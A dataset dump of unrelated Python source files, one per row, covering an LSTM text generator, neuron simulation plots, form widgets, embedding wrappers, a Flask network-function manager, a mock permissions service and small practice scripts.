text
stringlengths 8
6.05M
|
|---|
import argparse, glob, sys, json, ast, copy
import random
import tensorflow as tf
from data_provider import generate_data
from lstm_model import LSTM_model
import numpy as np
parser = argparse.ArgumentParser(prog="yikes_lolintator",
description="Send a sample text file to the yikes lolinator")
parser.add_argument('src_path', metavar='path', type=str, help="Path to a specific user's chat dialogue (.txt)")
parser.add_argument('epochs', metavar='num_epochs', type=int, help="Number of epochs to train for")
args = parser.parse_args()
files = glob.glob(args.src_path)
file_path = files[0]
data = generate_data(file_path)
# Hyperparameters
BATCH_SIZE = 1
SEQUENCE_LENGTH = 3
TARGET_LENGTH = len(data[2][0])
LEARNING_RATE = 0.001
DECAY_RATE = 0.97
HIDDEN_LAYERS = 1000
epochs = args.epochs or 1
tensorboard_dir = "./data_summaries"
def train_lstm(sess):
data = generate_data(file_path)
lstm_nn = LSTM_model(len(data[2][0]), BATCH_SIZE, SEQUENCE_LENGTH, TARGET_LENGTH, len(data[2][0]))
# Sessions created in this scope will run operations from `g_1`.
summaries = tf.summary.merge_all()
writer = tf.summary.FileWriter(tensorboard_dir)
writer.add_graph(sess.graph)
sess.run(tf.global_variables_initializer())
#sess.run(lstm_nn.learning_rate)
inputs, targets = data[0], data[1]
for j in range(0, epochs):
for i in range(len(inputs)):
print("ITERATION: "+str(i)+"/"+str(len(inputs)))
feed = {lstm_nn.inputs: [inputs[i]], lstm_nn.targets: [targets[i]]}
sess.run(lstm_nn.train_step, feed)
print("EPOCH: " + str(j) + ", Loss = " + str(lstm_nn.cost[-1]))
def text_gen(sess, input, length):
# Shift batches based on initial input to continue generating text
curr_input = input
data = generate_data(file_path)
phrase = ""
for i in range(0, length):
lstm_nn = LSTM_model(len(data[2][0]), BATCH_SIZE, SEQUENCE_LENGTH, TARGET_LENGTH, len(data[2][0]), training=False)
word = lstm_nn.predict_word(sess, curr_input, data[2])
phrase += word + " "
# This needs to be customized based on SEQUENCE_LENGTH later on
curr_input = [curr_input[1], curr_input[2], word]
print(phrase)
sess = tf.Session()
train_lstm(sess)
start_sentence = random.randint(0, TARGET_LENGTH - 4)
text_gen(sess, [data[2][1][start_sentence],
data[2][1][start_sentence + 1],
data[2][1][start_sentence + 2]], 300)
|
#! /usr/bin/python3
import sys
import os
sys.path.insert(0, os.path.abspath('../models'))
import numpy as np
import matplotlib.pyplot as plt
import sys
from LIF import *
from spike_train import plot_spike_trains
# Sinusoidal input
def I_sin(f):
def I(t): return 1 + np.sin(2*np.pi*f*t)
return I
#1
def stimuli_plot():
fig, axs = plt.subplots(3, 1, sharex='col')
t = np.linspace(0, 1, 10000)
for i, f in enumerate([1, 5, 40]):
I = I_sin(f)(t)
axs[i].plot(t, I)
axs[i].margins(None, 0.02)
axs[i].set_title("$f = {}$ Hz".format(f))
axs[i].title.set_position([.5, 1.03])
plt.xlabel("time $t$ (s)")
axs[1].set_ylabel("input current $I$")
plt.tight_layout()
#2
def sin_current(f, C, spiking, ax=None, xylabel=True):
if ax is None:
fig, ax = plt.subplots()
# recall that tau_m = R * C * 1e-3 (s)
neuron = LIF(I_sin(f), spiking, delta_t=0.1, EL=0, Vth=1, R=1, C=C)
neuron.computeV(1)
neuron.plot_V(ax, xylabel=xylabel, unit=False)
#3, 4
def sin_current_spikes(C):
fig, axs = plt.subplots(3, 1, sharex='col')
for i, f in enumerate([1, 5, 40]):
sin_current(f, C, True, axs[i], xylabel=False)
axs[i].set_title("$f = {}$ Hz".format(f))
axs[i].title.set_position([.5, 1.03])
plt.xlabel("time $t$ (s)")
axs[1].set_ylabel("membrane potential $V$")
plt.tight_layout(h_pad=-0.2)
#5
def tunning_curve_sin(fs):
num_spikes = []
for f in fs:
neuron = LIF(I_sin(f), delta_t=0.1, EL=0, Vth=1, R=1, C=100)
neuron.computeV(25)
num_spikes.append(len(neuron.spike_moments)/25)
plt.plot(fs, num_spikes)
plt.xlim(fs[0]-0.01, fs[-1]+0.01)
plt.xlabel("input current frequency $f$ (Hz)")
plt.ylabel("firing rate $f_{firing}$ (Hz)")
#6
def sin_trains():
fig, ax = plt.subplots(figsize=(10,3))
spike_trains = []
for f in [1, 2, 5, 10, 20, 40, 100]:
neuron = LIF(I_sin(f), delta_t=0.1, EL=0, Vth=1, R=1, C=100)
neuron.computeV(2)
spike_trains.append(neuron.spike_moments)
plot_spike_trains(spike_trains, (-0.001, 2.001), ax, 1.3)
ax.invert_yaxis()
# t in s, the larger is t, the better is the precision
def compute_frequency_spectrum(f, t_max):
spikes = np.zeros(t_max*10000+1)
neuron = LIF(I_sin(f), delta_t=0.1, EL=0, Vth=1, R=1, C=100)
neuron.computeV(t_max)
for spike_t in neuron.spike_moments:
spikes[int(spike_t * 10000)] = 1
spike_counts = np.convolve(spikes, np.hanning(3500), 'same')
# fig = plt.figure(1)
# plt.plot(np.linspace(0, t_max, t_max*10000+1), spike_counts)
# fig.show()
# this represents frequency from 0 to 10000 Hz
return np.abs(np.fft.fft(spike_counts))
#7
def plot_frequency_spectrum(f, t_max):
fs = compute_frequency_spectrum(f, t_max)
# f = plt.figure(2)
plt.plot(np.linspace(0, 50, t_max*50+1), fs[:t_max*50+1])
print((np.argmax(fs[1:t_max*5000+1])+1)/t_max)
plt.xlabel("frequency (Hz)")
plt.ylabel("amplitude")
#8
def tunning_curve_sin2(fs, t_max):
lowest_f_comp = []
for f in fs:
response_fs = compute_frequency_spectrum(f, t_max)
lowest_f_comp.append((np.argmax(response_fs[1:t_max*5000+1])+1)/t_max)
plt.plot(fs, lowest_f_comp)
plt.xlim(fs[0]-0.01, fs[-1]+0.01)
plt.xlabel("input current frequency $f$ (Hz)")
plt.ylabel("frequency of the neuronal response $f_r$ (Hz)")
#9
def tunning_curve_sin3(fs):
fts = []
for f in fs:
neuron = LIF(I_sin(f), delta_t=0.1, EL=0, Vth=1, R=1, C=100)
neuron.computeV(1)
fts.append(neuron.spike_moments[0])
plt.plot(fs, fts)
plt.xlim(fs[0]-0.01, fs[-1]+0.01)
plt.xlabel("input current frequency $f$ (Hz)")
plt.ylabel("first spike moment (s)")
cmd_functions = (
[ stimuli_plot,
lambda : sin_current(1, 100, False),
lambda : sin_current_spikes(100),
lambda : sin_current_spikes(10),
lambda : tunning_curve_sin(np.linspace(1, 40, 400)),
sin_trains,
lambda : plot_frequency_spectrum(20, 20),
lambda : tunning_curve_sin2(np.linspace(1, 40, 400), 10),
lambda : tunning_curve_sin3(np.linspace(1, 40, 400)) ])
if __name__ == "__main__":
n = int(sys.argv[1])
cmd_functions[n-1]()
plt.savefig("../../figures/LIFSin{}".format(n))
plt.show()
|
import time
x=17
n=int(input("Please enter the number you want to subtract with 17 :"))
if n>x:
absol_diff = -(n-x)
result=2*(absol_diff)
print("As",n,"is greater than",x,",calculating double to absolute diff ...")
time.sleep(1)
print("Result is :",result)
else:
print("As", n, "is smaller than", x, ",calculating the diff ...")
result=n-x
time.sleep(1)
print(result)
|
from .user import users
from .contact import contacts
|
# -*- coding: utf-8 -*-
from zeam.form.base.markers import NO_VALUE, Marker
from zeam.form.base.widgets import FieldWidget
from zeam.form.base.widgets import WidgetExtractor
from zeam.form.ztk.fields import Field, registerSchemaField
from zeam.form.ztk.interfaces import IFormSourceBinder
from grokcore import component as grok
from zope import component
from zope.i18nmessageid import MessageFactory
from zope.interface import Interface
from zope.schema import interfaces as schema_interfaces
from zope.schema.interfaces import IContextSourceBinder
from zope.schema.interfaces import IVocabularyTokenized, IVocabularyFactory
_ = MessageFactory("zeam.form.base")
class ChoiceField(Field):
"""A choice field.
"""
_source = None
_vocabularyFactory = None
_vocabularyName = None
def __init__(self, title,
source=None,
vocabularyName=None,
**options):
super(ChoiceField, self).__init__(title, **options)
if source is not None:
self.source = source
elif vocabularyName is not None:
self.vocabularyFactory = vocabularyName
@property
def vocabularyFactory(self):
if self._vocabularyFactory is None:
if self._vocabularyName is not None:
self._vocabularyFactory = component.getUtility(
schema_interfaces.IVocabularyFactory,
name=self._vocabularyName)
return self._vocabularyFactory
@vocabularyFactory.setter
def vocabularyFactory(self, factory):
if isinstance(factory, str):
self._vocabularyName = factory
self._vocabularyFactory = None
else:
self._vocabularyName = None
self._vocabularyFactory = factory
self._source = None
@property
def source(self):
return self._source
@source.setter
def source(self, source):
# Verify if this is a source or a vocabulary
if IVocabularyTokenized.providedBy(source):
self._source = source
else:
# Be sure to reset the source
self._source = None
self._vocabularyFactory = source
def getChoices(self, form):
source = self.source
if source is None:
factory = self.vocabularyFactory
assert factory is not None, \
"No vocabulary source available."
if (IContextSourceBinder.providedBy(factory) or
IVocabularyFactory.providedBy(factory)):
source = factory(form.context)
elif IFormSourceBinder.providedBy(factory):
source = factory(form)
assert IVocabularyTokenized.providedBy(source), \
"No valid vocabulary available, %s is not valid for %s" % (
source, self)
return source
def validate(self, value, form):
error = super(ChoiceField, self).validate(value, form)
if error is not None:
return error
if not isinstance(value, Marker):
choices = self.getChoices(form)
if value not in choices:
return _(u"The selected value is not among the possible choices.")
return None
# BBB
ChoiceSchemaField = ChoiceField
class ChoiceFieldWidget(FieldWidget):
grok.adapts(ChoiceField, Interface, Interface)
defaultHtmlClass = ['field', 'field-choice', 'form-control']
defaultHtmlAttributes = set(['required', 'size', 'style', 'disabled'])
_choices = None
def __init__(self, field, form, request):
super(ChoiceFieldWidget, self).__init__(field, form, request)
self.source = field
def lookupTerm(self, value):
choices = self.choices()
try:
return choices.getTerm(value)
except LookupError:
# the stored value is invalid. fallback on the default one.
default = self.component.getDefaultValue(self.form)
if default is not NO_VALUE:
return choices.getTerm(default)
return None
def valueToUnicode(self, value):
term = self.lookupTerm(value)
if term is not None:
return term.token
return u''
def choices(self):
if self._choices is not None:
return self._choices
# self.source is used instead of self.component in order to be
# able to override it in subclasses.
self._choices = self.source.getChoices(self.form)
return self._choices
class ChoiceDisplayWidget(ChoiceFieldWidget):
grok.name('display')
def valueToUnicode(self, value):
term = self.lookupTerm(value)
if term is not None:
return term.title
return u''
class ChoiceWidgetExtractor(WidgetExtractor):
grok.adapts(ChoiceField, Interface, Interface)
def extract(self):
value, error = super(ChoiceWidgetExtractor, self).extract()
if value is not NO_VALUE:
choices = self.component.getChoices(self.form)
try:
value = choices.getTermByToken(value).value
except LookupError:
return (None, u'Invalid value')
return (value, error)
# Radio Widget
class RadioFieldWidget(ChoiceFieldWidget):
grok.adapts(ChoiceField, Interface, Interface)
grok.name('radio')
def renderableChoices(self):
current = self.inputValue()
base_id = self.htmlId()
for i, choice in enumerate(self.choices()):
yield {'token': choice.token,
'title': choice.title or choice.token,
'checked': choice.token == current and 'checked' or None,
'id': base_id + '-' + str(i)}
def ChoiceSchemaFactory(schema):
field = ChoiceField(
schema.title or None,
identifier=schema.__name__,
description=schema.description,
required=schema.required,
readonly=schema.readonly,
source=schema.vocabulary,
vocabularyName=schema.vocabularyName,
interface=schema.interface,
constrainValue=schema.constraint,
defaultFactory=schema.defaultFactory,
defaultValue=schema.__dict__['default'] or NO_VALUE)
return field
def register():
registerSchemaField(ChoiceSchemaFactory, schema_interfaces.IChoice)
|
import logging
import os
import sys
import time
from functools import wraps
def time_logger(func):
"""
decorator for logging start and end time of function runs
:rtype:
"""
logger = logging.getLogger(__name__)
logger.setLevel(logging.INFO)
# tries creating a directory named 'logs' for logging. Quits the program if unsuccessful.
try:
os.mkdir("./logs")
except FileExistsError:
logger.addHandler(logging.FileHandler('./logs/timings.log'))
except BaseException as e:
print(f"Unable to create logs folder ({e}). Quitting..")
sys.exit()
# wrapper that writes function start and end timings to the log file
@wraps(func)
def wrapper_timer(*args, **kwargs):
logger.info(f"Function {func.__name__} started at {time.asctime()}")
value = func(*args, **kwargs)
logger.info(f"Function {func.__name__} ended at {time.asctime()}")
return value
return wrapper_timer
|
import random
print("Welcome to CardDraw")
deck = input("Please enter (s)tandard or (t)arot:")
if deck.lower() == "s":
suits = ["Spades", "Hearts", "Clubs", "Diamonds"]
ranks = ["Ace", "2", "3", "4", "5", "6", "7", "8", "9", "10", "Jack", "Queen", "King"]
my_suit = random.choice(suits)
my_rank = random.choice(ranks)
my_draw = (my_rank+" of "+my_suit)
print(my_draw)
elif deck.lower() == "t":
suits = ["Wands", "Cups", "Swords", "Coins"]
ranks = ["Ace", "2", "3", "4", "5", "6", "7", "8", "9", "10", "Page", "Knight", "Queen", "King"]
majors = ["The Fool", "The Magician", "The High Priestess", "The Empress", "The Emperor", "The Hierophant", "The Lovers", "The Chariot", "Justice", "The Hermit", "The Wheel of Fortune", "Strenght", "The Hanged Man", "Death", "Temperance", "The Devil", "The Tower", "The Star", "The Moon", "The Sun", "Judgement", "The World"]
randint = random.randint(1,78)
if randint >= 23:
my_suit = random.choice(suits)
my_rank = random.choice(ranks)
my_draw = (my_rank+" of "+my_suit)
print(my_draw)
else:
my_draw = random.choice(majors)
print(my_draw)
else:
deck = input("Please enter (s)tandard or (t)arot:")
|
from gensim.models import KeyedVectors as Word2Vec
import numpy as np
from embeddings import embedding_utils
from utils import file_utils
import os, re
import logging
DEBUG = False
class Model_Constants(object):
word2vec = "word2vec"
char2vec = "char2vec"
private_word2vec = "private_word2vec"
elmo = "elmo"
class Embedding_Model(object):
def __init__(self, name, vector_dim):
self.name = name
self.model = None
self.char_model = None
self.vocabs_list = None
self.vector_dim = vector_dim
# TODO: update this changeable param later
# unk, random, mean, replace_by_character_embedding
self.unknown_word = "replace_by_character_embedding"
# self.MAX_DIM = 400 # No longer use MAX_DIM, now it depends on input dims
def load_model(self, model_path):
if self.name == Model_Constants.word2vec or self.name == Model_Constants.elmo:
if model_path.endswith(".bin"):
self.model = Word2Vec.load_word2vec_format(model_path, binary=True)
else:
self.model = Word2Vec.load_word2vec_format(model_path, binary=False)
elif self.name == Model_Constants.char2vec:
self.model = dict()
print("Loading model_path = ", model_path)
file = open(model_path, "r")
for line in file:
elements = line.split()
if len(elements) > 100: # because embedding dim is higher than 100.
# char_model[elements[0]] = np.array(map(float, elements[1:])).tolist()
self.model[elements[0]] = np.array([float(i) for i in elements[1:]]).tolist()
return self.model
elif self.name == Model_Constants.private_word2vec:
self.model, _, self.vocabs_list = embedding_utils.reload_embeddings(model_path)
else:
raise Exception("Unknown embedding models!")
def is_punct(self, word):
arr_list = [
'!',
'"',
'%',
'&',
"'",
"''",
'(',
'(.',
')',
'*',
'+',
',',
'-',
'---',
'.',
'..',
'...',
'....',
'/',
]
if word in arr_list:
return True
else:
return False
def is_number(self, word):
regex = r"^[0-9]+"
matches = re.finditer(regex, word, re.MULTILINE)
matchNum = 0
for matchNum, match in enumerate(matches):
matchNum = matchNum + 1
if matchNum > 0:
return True
else:
return False
def set_char_model(self, char_model):
self.char_model = char_model
def load_vocabs_list(self, vocab_file_path):
"""
Load vocabs list for private w2v model. Has to be pickle file.
:param vocab_file_path:
:return:
"""
if vocab_file_path:
self.vocabs_list = file_utils.load_obj(vocab_file_path)
def get_char_vector(self, char_model, word):
"""
char_model here is an instance of embedding_model
:param char_model: an instance of embedding_model
:param word:
:return:
"""
if char_model is None:
# Sonvx on March 20, 2019: we now allow the char_model is None,
# cannot call this get_char_vector in such case.
raise Exception("Char_model is None! Cannot use character-embedding.")
out_char_2_vec = []
char_vecs = []
chars = list(word)
vecs = []
for c in chars:
if c in char_model.model:
emb_vector = char_model.model[c]
vecs.append(emb_vector)
if DEBUG:
input(">>>>>>")
print("Char_emb_vector=", emb_vector)
# char_vecs.extend(list(vecs))
if len(vecs) > 0:
out_char_2_vec = np.mean(vecs, axis=0)
if DEBUG:
print(">>> Output of char2vec: %s"%(out_char_2_vec))
input(">>>> outc2v ...")
return out_char_2_vec
def is_unknown_word(self, word):
"""Check whether or not a word is unknown"""
is_unknown_word = False
if self.vocabs_list is not None:
if word not in self.vocabs_list:
is_unknown_word = True
else:
if word not in self.model:
is_unknown_word = True
return is_unknown_word
def get_word_vector(self, word):
"""
Handle unknown word: In case of our private word2vec, we have a vocabs_list to check. With regular models,
we can check inside the model. Note that by default, we use char-model to handle unknown words.
:param word:
:param char_model:
:return:
"""
rtn_vector = []
# try first time with normal case
is_unknown_word = self.is_unknown_word(word)
# try 2nd times with lowercase.
if is_unknown_word:
word = word.lower()
is_unknown_word = self.is_unknown_word(word)
# unknown word
if is_unknown_word and self.char_model:
# Sonvx on March 20, 2019: solve unknown only when char_model is SET.
rtn_vector = self.get_vector_of_unknown(word)
else:
# normal case
if self.name == Model_Constants.word2vec:
rtn_vector = self.model[word]
# For now we have self.vector_dim, max_dim, and len(rtn_vector)
# Update: move to use self.vector_dim only
if len(rtn_vector) > self.vector_dim:
print("Warning: auto trim to %s/%s dimensions"%(self.vector_dim, len(rtn_vector)))
rtn_vector = self.model[word][:self.vector_dim]
elif self.name == Model_Constants.elmo:
rtn_vector = self.model[word]
if self.vector_dim == len(rtn_vector)/2:
vector1 = rtn_vector[:self.vector_dim]
vector2 = rtn_vector[self.vector_dim:]
print("Notice: auto average to b[i] = (a[i] + a[i + %s])/2 /%s dimensions" % (self.vector_dim,
len(rtn_vector)))
rtn_vector = np.mean([vector1, vector2], 0)
elif len(rtn_vector) > self.vector_dim:
print("Warning: auto trim to %s/%s dimensions" % (self.vector_dim, len(rtn_vector)))
rtn_vector = self.model[word][:self.vector_dim]
elif self.name == Model_Constants.char2vec:
rtn_vector = self.get_char_vector(self, word)
elif self.name == Model_Constants.private_word2vec:
# Handle unknown word - Not need for now since we handle unknown words first
if word not in self.vocabs_list:
word = "UNK"
word_idx = self.vocabs_list.index(word)
emb_vector = self.model[word_idx]
rtn_vector = emb_vector
# final check before returning vector
if DEBUG:
print(">>> DEBUG: len(rtn_vector) = %s" % (len(rtn_vector)))
input(">>> before returning vector ...")
if len(rtn_vector) < 1:
return np.zeros(self.vector_dim)
else:
if len(rtn_vector) == self.vector_dim:
return rtn_vector
# TODO: find a better way to represent unknown word by character to have same-size with word-vector-size
# For now, I add 0 to the [current-len, expected-len]
else:
logging.debug("Model name = %s, Current word = %s, Current size = %s, expected size = %s"
%(self.name, word, len(rtn_vector), self.vector_dim))
return np.append(rtn_vector, np.zeros(self.vector_dim - len(rtn_vector)))
def get_vector_of_unknown(self, word):
"""
If word is UNK, use char_vector model instead.
:param word:
:return:
"""
# Here we handle features based on the w2v model where
# numbers and punctuations are encoded as <punct>, <number>
if self.name == Model_Constants.word2vec:
if self.is_number(word):
rtn_vector = self.model["<number>"]
elif self.is_punct(word):
rtn_vector = self.model["<punct>"]
else:
rtn_vector = self.get_char_vector(self.char_model, word)
if rtn_vector is not None:
if len(rtn_vector) > self.vector_dim:
print("Warning: auto trim to %s/%s dimensions"%(self.vector_dim, len(rtn_vector)))
return rtn_vector[:self.vector_dim]
else:
return rtn_vector
# otherwise, using c2v to build-up the embedding vector
else:
return self.get_char_vector(self.char_model, word)
class Embedding_Models(object):
"""
Using all available embedding models to generate vectors
"""
def __init__(self, list_models):
self.list_models = list_models # list of embedding_model_objs: ['word2vec', 'char2vec', 'private_word2vec']
def add_model(self, emb_model, char_model):
"""
Add new model into the collection of embedding models. Note that, every model has to add char_model to handle
unknown word.
:param emb_model:
:param char_model:
:return:
"""
if char_model is None:
print("Warning: char_model is None -> cannot solve OOV word. Keep going ...")
# Sonvx on March 20, 2019: change to allow None char_model
# raise Exception("char_model cannot be None.")
if isinstance(emb_model, Embedding_Model):
emb_model.set_char_model(char_model)
self.list_models.append(emb_model)
else:
raise Exception("Not an instance of embedding_model class.")
def get_vector_of_document(self, document):
"""
Get all embedding vectors for one document
:param document:
:return:
"""
doc_vector = []
# debug_dict = {}
# print ("len_doc = ", len(document))
for word in document:
all_vectors_of_word = []
# get all embedding vectors of a word
for emb_model in self.list_models:
emb_vector = emb_model.get_word_vector(word)
# print("len_emb_vector = ", len(emb_vector))
all_vectors_of_word.extend(emb_vector)
# if word in debug_dict.keys():
# debug_dict[word].append(len(emb_vector))
# else:
# debug_dict[word] = [len(emb_vector)]
# stack a combined vector of all words
doc_vector.append(all_vectors_of_word)
# print("list of words and emb size = ", debug_dict)
# get the mean of them to represent a document
doc_vector = np.mean(doc_vector, axis=0)
return doc_vector
def get_word_vector_of_multi_embeddings(self, word):
"""
Get all embedding vectors for one document
:param word:
:return:
"""
word_vector = []
for emb_model in self.list_models:
emb_vector = emb_model.get_word_vector(word)
word_vector.extend(emb_vector)
return word_vector
|
from werkzeug.serving import run_simple
from flask import Flask,json,request,Response
from nfd_vnfm import NFD_VNFM
import sys
from threading import Thread
import time
import copy
import logging
from logging.handlers import RotatingFileHandler
logger = logging.getLogger()
logger.setLevel(logging.DEBUG)
formatter = logging.Formatter('%(asctime)s :: %(levelname)s :: %(message)s')
file_handler = RotatingFileHandler('activity.log', 'a', 1000000, 1)
file_handler.setLevel(logging.DEBUG)
file_handler.setFormatter(formatter)
logger.addHandler(file_handler)
stream_handler = logging.StreamHandler()
stream_handler.setLevel(logging.DEBUG)
logger.addHandler(stream_handler)
#TODO: get vnfm_overlay_ip by docker, not by bash
#import docker
#client = docker.from_env()
import pdb
# WSGI Application
front_app = Flask('front_app')
back_app = Flask('back_app')
#launch NDN vnfm
nfvo_host = sys.argv[1]
nfvo_port = sys.argv[2]
vnfm_bridge_ip = sys.argv[3]
vnfm_overlay_ip = sys.argv[4]
vnfm_port = sys.argv[5]
vnfm = NFD_VNFM(nfvo_host, nfvo_port, logger)
logger.debug('VNFM is UP!')
id_list=list()
id_list.append("EmptyList")
#TODO: all functions with threads to minimise request waiting
def vnfm_handle_egressGatewayJoin(container, interface, port):
vnfm.handle_RouterJoin(container, interface, port)
@front_app.route('/eGW/notifications/eGW_UP', methods=['POST'])
def handle_eGW_up():
logger.debug("eGW UP notification received")
router_infos = json.loads(request.data)
container = router_infos[u'container']
interface = router_infos[u'listening_interface']
port = router_infos[u'listening_port']
Thread(target=vnfm_handle_egressGatewayJoin, args=[container, interface, port]).start()
logger.debug("sending ACK for eGW")
return 'OK'
def vnfm_handle_ingressGatewayJoin(container, interface, port):
vnfm.handle_RouterJoin(container, interface, port)
@front_app.route('/iGW/notifications/iGW_UP', methods=['POST'])
def handle_iGW_up():
logger.debug("iGW UP notification received")
router_infos = json.loads(request.data)
container = router_infos[u'container']
interface = router_infos[u'listening_interface']
port = router_infos[u'listening_port']
Thread(target=vnfm_handle_ingressGatewayJoin, args=[container, interface, port]).start()
logger.debug("sending ACK for iGW")
return 'OK'
def vnfm_handle_RouterJoin(container, interface, port):
vnfm.handle_RouterJoin(container, interface, port)
@front_app.route('/router/notifications/router_UP', methods=['POST'])
def handle_vnf_up():
logger.debug("vnf UP notification received")
router_infos = json.loads(request.data)
container = router_infos[u'container']
interface = router_infos[u'listening_interface']
port = router_infos[u'listening_port']
Thread(target=vnfm_handle_RouterJoin, args=[container, interface, port]).start()
return 'OK'
def notifyNFVO():
logger.debug('sending VNFM UP notification to NFVO')
vnfm.nfvo_client.notify_nfvo()
@back_app.route('/nfvo/notifications/nfvoUP')
def nfvoUP():
logger.debug("NFVO UP notification received")
Thread(target=notifyNFVO).start()
return 'OK'
@back_app.route('/nfvo/faces/configuration', methods=['POST'])
def initial_configuration():
if not initial_configuration.received:
logger.debug("VNFs initial configuration received from NFVO")
data = json.loads(request.data)
vnfm.set_managed_vnfs_list(data['vnfs_id'])
config = {key:data[key] for key in data.keys() if key != 'vnfs_id'}
vnfm.embed_vnfs_initial_configuration(config)
logger.debug(str(config))
initial_configuration.received = True
else:
logger.debug("initial configuration already received")
return 'OK'
initial_configuration.received=False
@back_app.route('/nfvo/firewall/update', methods=['POST'])
def update_firewall():
data = json.loads(request.data)
vnfm.update_firewall_config(data["vdu_id"], data['prefix_list'])
logger.debug(str(data))
initial_configuration.received = True
return 'OK'
@front_app.route('/doctor/MMTenant/report', methods=['POST'])
def mmt_report():
data = request.values.to_dict()['data']
data = json.loads(data)
data["ip"]=request.remote_addr
logger.debug(str(data))
print data
if data['alert_id'] == 102:
vnfm.nfvo_client.forward_cpa_alert(data)
elif data['alert_id'] == 103:
logger.debug(data)
vnfm.nfvo_client.forward_pit_stats_in(data)
return 'OK'
def forward_sv_report(data):
vnfm.nfvo_client.forward_sv_report(data)
@front_app.route('/sv/report', methods=['POST'])
def handle_sv_report():
logger.debug("SV notification received")
data = json.loads(request.data)
Thread(target=forward_sv_report, args=(data, )).start()
return 'OK'
def update_service(config):
vnfm.update_service(config['container_down'],
config['ingress_configurations'],
config['replicas_configurations'])
@back_app.route('/nfvo/update_service', methods=['POST'])
def handle_update_service():
data = json.loads(request.data)
Thread(target=update_service, args=(data, )).start()
return 'OK'
def finish_scale_out(config):
vnfm.finish_scale_out(config['container_down'],
config['ingress_configurations'],
config['replicas_configurations'])
@front_app.route('/router/notifications/finish_scale_out', methods=['POST'])
def handle_finish_scale_out():
data = json.loads(request.data)
Thread(target=finish_scale_out, args=(data, )).start()
return 'OK'
def update_faces(data):
router_id = data['router_id']
faces = data['faces']
vnfm.vnf_clients[router_id].send_update_faces(faces)
@back_app.route('/nfvo/update_faces', methods=['POST'])
def handle_update_faces():
data = json.loads(request.data)
Thread(target=update_faces, args=(data, )).start()
return 'OK'
def update_router_mode(router_mode):
router_id = router_mode['router_id']
mode = router_mode['router_mode']
vnfm.vnf_clients[router_id].send_update_mode(mode)
@back_app.route('/nfvo/update_router_mode', methods=['POST'])
def handle_update_router_mode():
data = json.loads(request.data)
Thread(target=update_router_mode, args=(data, )).start()
return 'OK'
def start_front_app():
logger.debug("starting VNFM server on admin_net(VNFM<-->VNFs)")
front_app.run(host=vnfm_overlay_ip, port=4999, debug=False)
def start_back_app():
logger.debug("starting VNFM server on bridge_net (VNFM<-->NFVO)")
back_app.run(host=vnfm_bridge_ip, port=vnfm_port, debug=False)
if __name__ == '__main__':
Thread(target=start_back_app).start()
start_front_app()
"""
if __name__ == '__main__':
app.run(host=vnfm_host, port=vnfm_port, use_reloader=False)
"""
|
# Definition for singly-linked list.
# class ListNode:
# def __init__(self, x):
# self.val = x
# self.next = None
class Solution:
# @param A : head node of linked list
# @param B : head node of linked list
# @return the head node in the linked list
def addTwoNumbers(self, A, B):
def get_len(head):
length = 0
current = head
while current:
length += 1
current = current.next
return length
if not A:
return B
if not B:
return A
A_len, B_len = get_len(A), get_len(B)
if B_len > A_len:
A, B = B, A
current_A, current_B = A, B
carry = 0
for i in range(max(A_len, B_len)):
added = carry + current_A.val
if current_B:
added += current_B.val
current_B = current_B.next
current_A.val = added % 10
carry = added / 10
if current_A.next:
current_A = current_A.next
else:
if carry:
current_A.next = ListNode(carry)
return A
|
"""
Model objects for the Valkyrie mimic.
"""
from __future__ import absolute_import, division, unicode_literals
import attr
from json import dumps
from mimic.util.helper import random_hex_generator
class AccountContactPermission(object):
"""
An intersection object representing a certain contact's permissions on a certain account's items
"""
permission_type_map = {
6: "view_domain",
4: "view_billing",
14: "admin_product", # device.admin
10: "manage_users",
8: "manage_certificates",
19: "edit_firewall_config",
2: "edit_ticket",
18: "view_firewall_config",
15: "account_admin", # account.admin
7: "edit_domain",
13: "edit_product", # device.admin
3: "view_community",
17: "view_reports",
16: "move_manager",
12: "view_product", # device.observer
11: "manage_contact",
9: "upgrade_account",
5: "edit_billing",
1: "view_ticket"}
item_type_map = {
1: "accounts",
2: "devices"}
def __init__(self, account_number, contact_id, permission_type, item_id, item_type_id):
"""
Constructor
"""
self.account_number = account_number
self.contact_id = contact_id
self.permission_type = permission_type
self.permission_name = self.permission_type_map.get(self.permission_type, "unknown")
self.item_id = item_id
self.item_type_id = item_type_id
self.item_type_name = self.item_type_map.get(self.item_type_id, "unknown")
def json(self):
"""
Create a JSON representation of self
"""
return {
"account_number": self.account_number,
"contact_id": self.contact_id,
"permission_type": self.permission_type,
"permission_name": self.permission_name,
"item_id": self.item_id,
"item_type_id": self.item_type_id,
"item_type_name": self.item_type_name
}
@attr.s
class ValkyrieStore(object):
"""
Extremely barebones Valkyrie backing store with some direct, static permissions.
No create or delete permissions endpoints are implemented.
No logic for determining effective permissions from indirect permissions is present.
A GET on the following URI, for example, should always return four effective permissions:
http://localhost:8900/valkyrie/v2/account/123456/permissions/contacts/devices/by_contact/12/effective
...while a GET on this URI should return one:
http://localhost:8900/valkyrie/v2/account/123456/permissions/contacts/devices/by_contact/56/effective
"""
valkyrie_store = attr.ib(default=attr.Factory(list))
permissions = []
# Arguments are: account, contact, (direct) permission, item, item_type (1=account or 2=device)
permissions.append(AccountContactPermission(123456, 12, 12, 256, 2))
permissions.append(AccountContactPermission(123456, 12, 12, 4096, 2))
permissions.append(AccountContactPermission(123456, 12, 13, 16384, 2))
permissions.append(AccountContactPermission(123456, 12, 14, 65536, 2))
permissions.append(AccountContactPermission(123456, 34, 15, 123456, 1))
permissions.append(AccountContactPermission(123456, 56, 12, 256, 2))
permissions.append(AccountContactPermission(654321, 78, 14, 262144, 2))
permissions.append(AccountContactPermission(654321, 90, 12, 1048576, 2))
permissions.append(AccountContactPermission(654321, 90, 15, 654321, 1))
def create_token(self, request):
"""
Create an auth token without even interrogating the POSTed credential data
"""
request.setResponseCode(200)
token = {"X-Auth-Token": str(random_hex_generator(16))}
return dumps(token)
def get_permissions(self, request, account_number, contact_id, item_type):
"""
Retrieve the permissions (if any) belonging to the given account,
contact, and item type (item_type=1 -> accounts, item_type=2 -> devices
"""
pm = [p for p in self.permissions if (p.account_number == account_number and
p.contact_id == contact_id and
(item_type is None or p.item_type_id == item_type))]
response_message = {"contact_permissions": []}
for p in pm:
response_message['contact_permissions'].append(p.json())
return dumps(response_message)
|
# Docstring (__doc__) is short for documentationstring
# A docstring is always written with """
# It's the first string that occurs as a statement in a module, function, class or method definition
def double(num):
"""Function to double the value"""
return 2*num
|
import numpy as np
import tensorflow as tf
import tensorflow.keras as keras
tf.random.set_seed(1)
X=np.array([[0,0],[0,1],[1,0],[1,1]]) #0=False, 1=True
